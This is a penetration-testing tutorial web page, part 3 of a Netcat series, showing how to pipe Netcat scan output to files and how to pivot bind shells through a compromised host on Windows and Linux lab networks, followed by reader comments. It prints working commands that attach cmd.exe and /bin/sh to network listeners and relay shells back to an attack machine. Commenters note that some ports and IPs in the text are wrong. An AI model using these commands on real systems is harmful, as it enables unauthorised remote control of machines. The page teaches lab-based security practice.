• Home
  • About Us
  • General
  • Wireless
  • Web
  • Scanning
  • Metasploit
  • Hacking Courses
    • OSCP
    • The Virtual Hacking Labs
    • Certified Ethical Hacker (CEH)
    • Hacking Books
  • More
    • Exploit tutorials
    • Pentesting Exchange
    • Networking
    • Malware Analysis
    • Hacking Metasploitable 2/3
    • Digital Forensics
  • Contact
Facebook Twitter Instagram
Trending
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
  • Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
  • Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
  • Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
Facebook Twitter YouTube Tumblr Instagram Pinterest
Hacking Tutorials
  • Home
  • About Us
  • General
  • Wireless
  • Web
  • Scanning
  • Metasploit
  • Hacking Courses
    • OSCP
    • The Virtual Hacking Labs
    • Certified Ethical Hacker (CEH)
    • Hacking Books
  • More
    • Exploit tutorials
    • Pentesting Exchange
    • Networking
    • Malware Analysis
    • Hacking Metasploitable 2/3
    • Digital Forensics
  • Contact
Hacking Tutorials
You are at:Home » Networking » Hacking with Netcat part 3: Advanced Techniques
Hacking with netcat part 3 - Advanced Techniques

Hacking with Netcat part 3: Advanced Techniques

15
By Hacking Tutorials on March 23, 2017 Networking

In part 3 of the Hacking with Netcat tutorial series we will be looking at some more advanced techniques. As we know by now Netcat is also called the Swiss army knife of networking tools. Swiss army networking tools should be able to do a lot more than making raw data connections and shells. Therefore we have to look at some advanced features too. In this tutorial we will learn how to pipe Netcat output to files and applications and how network pivoting with Netcat works. In this tutorial we will be looking at a couple different scenario’s where we will be using Netcat to pivot connections. Pivoting network connections is useful when a target host is on a network that is not directly accessible from the attack box’s network. In this situation we can compromise a host that has access to both networks and pivot connections through this host. The compromised host with access to both networks is called the pivot point. Let’s start with piping Netcat’s output to files and applications.

If you haven’t read part 1 and 2 of the hacking with Netcat series you can find them here:

  • Hacking with Netcat part 1: The Basics
  • Hacking with Netcat part 2: Bind and Reverse shells
  • Hacking with Netcat part 3: Advanced Netcat techniques

Piping Netcat output to files

First we will be piping the output from a simple netcat port scan to a file named output.txt. In general command line output can be outputted to a file by using the > operator followed by a file name. For Netcat this won’t work because we need to direct both stderr and stdout into the file. We can do this by using the following command:

nc -vv -z localhost 1-100 > output.txt 2>&1

1 - Netcat write output to file
Output Netcat port scan to file.

This command outputted all result from the port scan to the output.txt file. We can use the following command to filter the output for open ports using grep:

nc -vv -z localhost 1-100 2>&1 | grep open > output.txt

2 - Netcat grep output to file
Grep netcat output to file.

This command only outputs the open ports to the text file. Let’s see how we can pipe netcat input and output to pivot network connections.

Windows network pivoting with Netcat

Let’s assume we have 2 Windows targets and 1 Kali Linux attack box. We have compromised Windows host 1 from the Kali Linux machine and we want to gain a shell on Windows host 2 which is only accessible from Windows host 1. We would need to direct the traffic from the Kali Linux host to Windows host 1 and then redirect it to Windows host 2. The output should be send back to Windows host 1 where it will be redirected back to the Kali Linux machine. Confusing? Let’s have a look at the following graphic for a better understanding:

3 - Netcat Windows pivoting

In a virtual lab we have configured this scenario with 2 Windows machines and 1 Kali Linux machine. On the pivot point we will be piping the input commands from the attack box to the target host. The output from the target host will be piped back to the attack box from the pivot point. Let’s have at which Netcat commands we have to use for every machine. We will be using port 3333 and port4444 for the connections.

  • Windows host 1 needs to direct incoming traffic on port 3333 to Windows host 2 on port 4444 and input traffic from Windows host 2 must be send to Kali Linux output on port 2222.
  • Windows host 2 needs to attach incoming commands on port 4444 to CMD.exe and redirect the output back to Windows host 1 on port 4444.
  • Kali Linux should be sending commands to Windows host 1 on port 3333 and receive input from Windows host 1 on port 4444.

Given this information we need to issue the following commands on each machine in this order:

  • Kali Linux console Input: nc -lvp 3333
  • Kali Linux console Ouput: nc -lvp 4444
  • Windows host 2: nc -lvp 4444 -e cmd.exe
  • Windows host 1: nc.exe 10.11.1.16 3333 | nc.exe 10.11.1.198 4444 | nc.exe 10.11.1.16 2222

The following graphic describes the connections between the Kali Linux attack machine, the windows host 1 pivot point and the target host; windows host 2.

4 - Windows netcat network pivoting example
Redirecting traffic with Netcat.

The commands issued on the input terminal on the Kali Linux attack box are executed via the pivot point on Windows host 2. The output from Windows host 2 is redirected back to the output terminal on the attack box. The only problem with this setup is that there is a delay on the executed commands and the output. After issuing a command you have to press enter once or twice to see the output appearing in the output terminal on the attack host.

There is also an easier alternative when the -e switch on netcat is available on the pivot point. This alternative only uses 1 terminal session on the attack host. Let’s have a look at how this works by looking at the following commands:

  • Kali Linux attack box: nc -lvp 4444
  • Windows host 2: nc -lvp 4444 -e cmd.exe
  • Windows host 1 – pivot point: nc -v 10.11.1.16 4444 -c ”nc -v 10.11.1.198 4444”

The first commands sets up listener on the attack box and the second command on the target host. The last command opens a Netcat session with the attack box and uses a new Netcat session to the target host as inbound program. Note that the pivot point and target host both use the -e switch on Netcat.

5 - Windows netcat network pivoting example 2
Network pivoting with Netcat on Windows.

As you can see on the first terminal we have shell on the target host through the pivot point. This construction also has a delay so you have to press enter once or twice receive output from the target host. If you know how to fix this, please leave a comment below!

Let’s see if we can do the same thing on 3 Linux hosts.

Linux network pivoting with Netcat

In the following scenario we have 3 Linux hosts:

  • 10.11.1.16 is the attack box running on Kali Linux.
  • 10.11.1.250 is the pivot point.
  • 10.11.1.95 is the target host.

The following graphic illustrates the scenario with the attack box, pivot point and target host:

Linux netcat network pivoting scenario

We will be using the following commands on the different hosts in the following order:

  • 10.11.1.16 attack box: nc -lvp 4444
  • 10.11.1.96 target host: nc -lvp 4444 -e /bin/sh
  • 10.11.1.250 pivot point: nc -v 10.11.1.16 4444 -e ”nc -v 10.11.1.96 4444”

The first command sets up a listener on port 4444 on the Kali Linux attack box. The second command sets up a listener on the target host, also on port 4444. The last command is executed on the pivot machine and connects to both the attack box and the target host on port 4444.

The following screenshot displays the different terminals from the 3 machines. The first terminal is the attack box, the second terminal is the pivot point and the last one is the target host:

7 - Linux netcat network pivoting example
Network pivoting with Netcat on Linux.

On the attack box terminal we have issued the whoami and ifconfig commands. The output of whoami is root and ifconfig outputs the IP information for host 10.11.1.95. This setup works perfectly and we are able to control the target host which is on network that is not routable from the attack box network by pivoting the connection through the pivot point. This scenario may seem a bit confusing at first but don’t worry. Take your time to understand and maybe practice this situation to get a better understanding of what is exactly happening.

So far we have learned about piping Netcat output such as port scan results and connections. We also learned how to use pivot points on Linux and Windows to pivot network connections. Do you have more ideas for advanced techniques and Netcat tutorials? Please let us know by using the comment functionality and we will be adding new techniques to this tutorial.

Virtual Hacking Labs - Penetration testing lab

Hacking Courses on Udemy


Bug Bounty – An Advanced Guide to Finding Good Bugs

Real World Bug Bounty Techniques

Website Hacking / Penetration Testing & Bug Bounty Hunting

Become a bug bounty hunter! Hack websites & web applications like black hat hackers and secure them like experts.

Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
Previous ArticleInstalling Caine 8.0 on a virtual machine
Next Article Hacking and Securing Wing FTP Server 4.3.8

Related Posts

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

Installing Rogue-jndi on Kali Linux

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations

15 Comments

  1. Bruce Malaudzi on March 23, 2017 5:58 pm

    This is amazing tutorial. I will lab and try it out. Great work!!!

    Reply
    • Hacking Tutorials on March 23, 2017 8:22 pm

      Thanks Bruce! Very appreciated!

      Reply
    • Noe on May 22, 2018 6:04 am

      How can I setup a lab for penetration testing?

      Reply
  2. Tony Balazs on October 19, 2017 8:58 pm

    What can be done, though, if the target machine is behind NAT and connected to the router with no available pivot point? Can the router become a pivot point?

    Reply
    • Hacking Tutorials on October 23, 2017 9:18 am

      Can you further elaborate this scenario with some more details?

      Reply
    • ikben on October 23, 2017 4:04 pm

      of course. the router also can be a proxy. isnt that what he is supposed to do by default?
      but in this case u should use reverse shell, if u have a public ip under your control.
      using the server behind the public ip directly or also as a proxy/pivot point would help u!

      Reply
  3. SG on December 31, 2017 4:16 am

    Very Nice. Thank you James.
    Heads up: under Linux network pivoting with Netcat
    10.11.1.250 pivot point: nc -v 10.11.1.16 4444 -c ”nc -v 10.11.1.96 4444”

    should have an -e and not a -c

    10.11.1.250 pivot point: nc -v 10.11.1.16 4444 -e ”nc -v 10.11.1.96 4444”

    Reply
    • Hacking Tutorials on December 31, 2017 6:15 pm

      Hi!

      Thank you very much for the heads up! Just changed it.

      Reply
      • Usopp on December 11, 2018 12:35 am

        Windows host 1 – pivot point: nc -v 10.11.1.16 4444 -c ”nc -v 10.11.1.198 4444”

        Should also change it to -e since screenshot uses -e, though both options work.

        Reply
  4. Prateek Patil on January 6, 2018 7:34 pm

    Great article! I’ve an off-topic question though, what should i prefer for encrypted tunneling? SSH, cryptcat or ncat with SSL? Thank you!

    Reply
    • Hacking Tutorials on January 7, 2018 8:56 pm

      Thanks! I would say SSH.

      Reply
  5. Ryan on April 11, 2019 2:09 pm

    Very Awesome Indeed!!!

    Reply
  6. Angus Rose on June 4, 2019 2:00 pm

    Excellent tutorial. I learned so much. Thanks

    Reply
  7. Boris on November 6, 2019 8:56 am

    there are 2 mistakes in the article , confusion with port and confusion with IP
    1)
    Given this information we need to issue the following commands on each machine in this order:

    Kali Linux console Input: nc -lvp 3333

    supposed to be port 2222

    2)
    We will be using the following commands on the different hosts in the following order:

    10.11.1.16 attack box: nc -lvp 4444
    10.11.1.96 target host: nc -lvp 4444 -e /bin/sh

    supposed to be IP with 95 not 96

    Reply
  8. emre on December 14, 2019 12:39 am

    how is connection router behind of pc?

    Reply

Leave A Reply Cancel Reply

Top Tutorials
By Hacking TutorialsOctober 29, 20220

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

By Hacking TutorialsJanuary 10, 20220

Installing Rogue-jndi on Kali Linux

By Hacking TutorialsDecember 17, 20210

Log4Shell VMware vCenter Server (CVE-2021-44228)

By Hacking TutorialsSeptember 27, 20210

The Great Leak: Microsoft Exchange AutoDiscover Design Flaw

By Hacking TutorialsFebruary 4, 20200

CVE-2019-19781: Citrix ADC RCE vulnerability

By Hacking TutorialsNovember 1, 20188

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations

Subscribe

Enter your email address to subscribe to Hacking Tutorials and receive notifications of new tutorials by email.

Join 828 other subscribers
Recent Tutorials
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
Virtual Hacking Labs
Penetration Testin Course and Hacking Labs
Categories
  • Digital Forensics
  • Exploit tutorials
  • General Tutorials
  • Hacking Books
  • Hacking Courses
  • Malware Analysis Tutorials
  • Metasploit Tutorials
  • Networking
  • Pentesting Exchange
  • Scanning Tutorials
  • Web Applications
  • Wifi Hacking Tutorials
Downloads
  • directory_scanner.py (120599 downloads)
  • PEiD-0.95-20081103.zip (111451 downloads)
  • wifi_jammer.py (138196 downloads)
Recent Tutorials
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
  • Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
Popular Tutorials
By Hacking TutorialsSeptember 1, 2016115

Review: Offensive Security Certified Professional (OSCP)

By Hacking TutorialsApril 18, 201738

Exploiting Eternalblue for shell with Empire & Msfconsole

By Hacking TutorialsMarch 17, 201637

Installing VPN on Kali Linux 2016 Rolling

Featured Downloads
  • directory_scanner.py (120599 downloads)
  • PEiD-0.95-20081103.zip (111451 downloads)
  • wifi_jammer.py (138196 downloads)
© Hacking Tutorials 2022

Type above and press Enter to search. Press Esc to cancel.

Go to mobile version